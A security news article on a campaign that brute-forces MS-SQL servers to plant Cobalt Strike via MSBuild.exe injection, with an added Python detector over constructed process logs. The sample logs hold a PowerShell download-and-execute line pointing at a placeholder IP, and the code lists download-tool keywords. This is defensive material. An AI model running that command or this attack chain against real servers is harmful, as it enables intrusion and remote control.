Hackers distribute Cobalt Strike to unpatched MS-SQL server instances

Most attacks were likely conducted by the same threat actor, the researchers believe

Hackers are trying to deploy the Cobalt Strike adversary simulation tool on vulnerable internet-facing Microsoft SQL (MS-SQL) server instances as part of a new campaign that aims to steal confidential information from compromised machines.

The warning comes from researchers at AhnLab Security Emergency Response Center (ASEC) who say they have seen multiple logs of Cobalt Strike over the past month.

Cobalt Strike is a commercial penetration testing platform that enables a tester to install a 'Beacon' agent on a target machine, allowing remote access to the system.

It was developed as a security tool to emulate attacks on networks, but cracked versions of the software are now used by a wide range of threat actors for post-exploitation access to victims' networks, from which they deliver secondary payloads such as ransomware.

According to the researchers, attackers targeting MS-SQL servers typically scan for TCP port 1433 to find instances that are exposed to the internet. They then attempt to log in with brute-force or dictionary attacks against the administrator account (on MS-SQL, usually the built-in 'sa' login).

Even when the MS-SQL server is not exposed to the internet, malware that has already gained a foothold in the network, such as LemonDuck, can scan port 1433 internally and use the database server for lateral movement. Coin-mining malware such as Vollgar and Kingminer also targets MS-SQL servers.

"Cobalt Strike that has recently been discovered was downloaded through cmd.exe and powershell.exe via the MS-SQL process," the researchers said in a report published on Monday.

The malware the attackers drop is an injector: it decodes an encrypted Cobalt Strike payload embedded within itself, then launches the legitimate Microsoft build tool MSBuild.exe and injects the payload into that process.
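The chain described above, the database engine process spawning cmd.exe and powershell.exe to fetch a payload and an untrusted binary then launching MSBuild.exe, is visible in process-creation telemetry. The detector below is an added example, not code from the ASEC report; it walks Sysmon-style process creation records, flags shells whose ancestry includes sqlservr.exe, and flags MSBuild.exe when it is started without a project file or descends from the database process. The records, GUIDs, file paths, the injector name update.exe and the download URL are all constructed for the example.

```python
import ntpath

# Shells an attacker reaches through the database engine's OS command execution,
# and command-line fragments that indicate a download stage.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "certutil", "bitsadmin", "curl ", "wget ")
# A real build normally names one of these on the command line. This is a
# heuristic: attackers can also hand MSBuild a crafted project file.
PROJECT_EXTS = (".proj", ".csproj", ".vbproj", ".sln", ".targets")

# Constructed Sysmon Event ID 1-style records trimmed to the fields the rules use.
EVENTS = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": r'"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER'},
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a')\""},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a')\""},
    # Hypothetical injector dropped by the download stage.
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3", "Image": r"C:\ProgramData\update.exe",
     "CommandLine": r"C:\ProgramData\update.exe"},
    {"ProcessGuid": "g5", "ParentProcessGuid": "g4",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    # Benign activity that must not be flagged.
    {"ProcessGuid": "g6", "ParentProcessGuid": "g0", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessGuid": "g7", "ParentProcessGuid": "g6", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"ProcessGuid": "g8", "ParentProcessGuid": "g6", "Image": r"C:\VS\Common7\IDE\devenv.exe",
     "CommandLine": "devenv.exe"},
    {"ProcessGuid": "g9", "ParentProcessGuid": "g8",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe MyApp.csproj /t:Build /p:Configuration=Release"},
]


def basename(image):
    return ntpath.basename(image).lower()


def ancestors(by_guid, guid):
    """Image basenames of a process's ancestors, nearest parent first."""
    names, seen = [], set()
    ev = by_guid.get(guid)
    while ev is not None and ev["ParentProcessGuid"] not in seen:
        seen.add(ev["ParentProcessGuid"])
        ev = by_guid.get(ev["ParentProcessGuid"])
        if ev is not None:
            names.append(basename(ev["Image"]))
    return names


def analyse(events):
    """Return a finding dict for every record that matches a rule."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["Image"])
        cmd = e["CommandLine"].lower()
        under_sql = "sqlservr.exe" in ancestors(by_guid, e["ProcessGuid"])
        if name in SHELLS and under_sql:
            reason = "shell spawned under sqlservr.exe"
            if any(cue in cmd for cue in DOWNLOAD_CUES):
                reason += ", command line contains a download cue"
            findings.append({"guid": e["ProcessGuid"], "image": name, "reason": reason})
        elif name == "msbuild.exe":
            args = [a.strip('"') for a in cmd.split()[1:]]
            reasons = []
            if not any(a.endswith(PROJECT_EXTS) for a in args):
                reasons.append("MSBuild.exe started without a project file")
            if under_sql:
                reasons.append("MSBuild.exe descends from sqlservr.exe")
            if reasons:
                findings.append({"guid": e["ProcessGuid"], "image": name, "reason": "; ".join(reasons)})
    return findings


def flagged_guids(events):
    return sorted(f["guid"] for f in analyse(events))


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"{f['guid']} {f['image']}: {f['reason']}")
```

The developer's MSBuild run from devenv.exe and the interactive cmd.exe under explorer.exe pass, while the cmd.exe and powershell.exe beneath sqlservr.exe and the argument-less MSBuild.exe under the injector are reported. On a production database host, sqlservr.exe spawning any shell at all is rare enough that the first rule alone is usually a high-fidelity alert.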

The Cobalt Strike payload running inside MSBuild.exe is configured with an additional evasion option: it loads the legitimate Windows library wwanmm.dll and then overwrites that DLL's memory space with the Beacon and executes it from there.

The Beacon, which receives the attacker's commands and carries out the malicious behaviour, then executes from memory that is backed by a legitimate module on disk rather than from an unbacked, suspicious region, so it evades memory scanners that only look for executable memory with no file behind it. A check that does catch this is to compare the code section of wwanmm.dll as loaded in the MSBuild.exe process against the copy of the DLL on disk: the overwritten section no longer matches the file.

Over the last month, AhnLab's ASD (AhnLab Smart Defense) infrastructure has recorded a slew of Cobalt Strike logs, according to the researchers, who believe most of the attacks were conducted by the same threat actor, given that the download URLs and the command and control server URL are similar across incidents.